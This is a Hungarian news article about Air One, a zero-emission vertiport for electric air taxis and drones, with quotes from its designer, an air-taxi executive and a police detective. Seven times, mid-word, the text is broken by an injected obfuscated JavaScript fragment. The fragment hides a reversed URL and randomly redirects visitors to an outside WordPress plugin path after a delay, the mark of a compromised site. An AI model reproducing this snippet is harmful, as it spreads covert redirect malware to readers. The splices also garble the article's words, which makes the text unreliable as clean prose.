Az úgynevezett Air One a világ első nulla károsanyag-kibocsátású vertikális légikikötője. A létesítményt csaknem 11 hétig építették, és az elsődleges célja, hogy bemutassa a városi légiközlekedésben rejlő lehetőségeket. A repülőtér a függőleges le- és felszállásra képes, elektromos hajtású drónok és légitaxik központja lehet.
Kialakítása olyan, mint egy hagyományos repülőtéré: van biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonsági beléptetőkapu, váróterem és felszállópálya is. Mindez pedig a város szívében kap helyet.
„Az első és legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb a mai napon, hogy bemutassuk, hogyan működnek ezek a járművek. Mindenki azt kérdezgeti, hogy nem lesz-e túlzsúfolva az ég, tele drónokkal. A válasz az, hogy nem, amíg a földi infrastruktúra megfelelően szervezett” – nyilatkozta Ricky Sandhu, a repülőteret tervező cég elnök-vezérigazgatója
A futurisztikus repülő taxi protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totípusa hasonlít egy helikopterhez, de nyolc rotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja van, és elektromos meghajtással működik, ezért sokkal csendesebb. Az elektromos légitaxik használatát hivatalosan még nem engedélyezték, az azokat tervező cég kereskedelmi vezérigazgatója azonban úgy számol,
a légi közlekedés e formája 2030-ra már mindennapos jelenséggé válhat.
„Ezeket a légitaxikat nagy mennyiségben és alacsonyabb költséggel tudjuk legyártani, mint a hagyományos repülőgépeket. Ezáltal a jármű sokkal elérhetőbbé válik, és nem egy olyan termékről van szó, amely csak a gazdagabb rétegnek szól” – magyarázta Michael Whitaker.
A városi légi közlekedési központoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok nem csupán a kereskedelemben és a közlekedésfejlesztésében kaphatnak szerepet, de a bűnmegelőzést is segíthetik.
„Egy ilyen létesítményből könnyebben tudnánk más szervezetekkel is összedolgozni. Ráadásul a közösség számára is sokkal átláthatóbb a működése, mint egy rendőrkapitányság. Az emberek sokszor hiszik azt, hogy a drónokkal megfigyelés alatt tartjuk őket. Pedig első orban a bűncselekmények megelőzésére és az emberi élet megmentésére szolgálnak” – nyilatkozta Mark Colwell, a West Midlands-i rendőrség nyomozója.
A NASA előrejelzései szerint a légiközlekedési szektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor csak az Egyesült Államokban akár 500 milliárd dolláros piaccá fejlődhet a következő években.
Ennek a legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb feltétele pedig a megfelelő infrastruktúra kialakítása. Ezért a repülőteret tervező vállalat a következő öt év alatt több mint 200, nulla károsanyag-kibocsátású központ telepítését tervezi világszerte.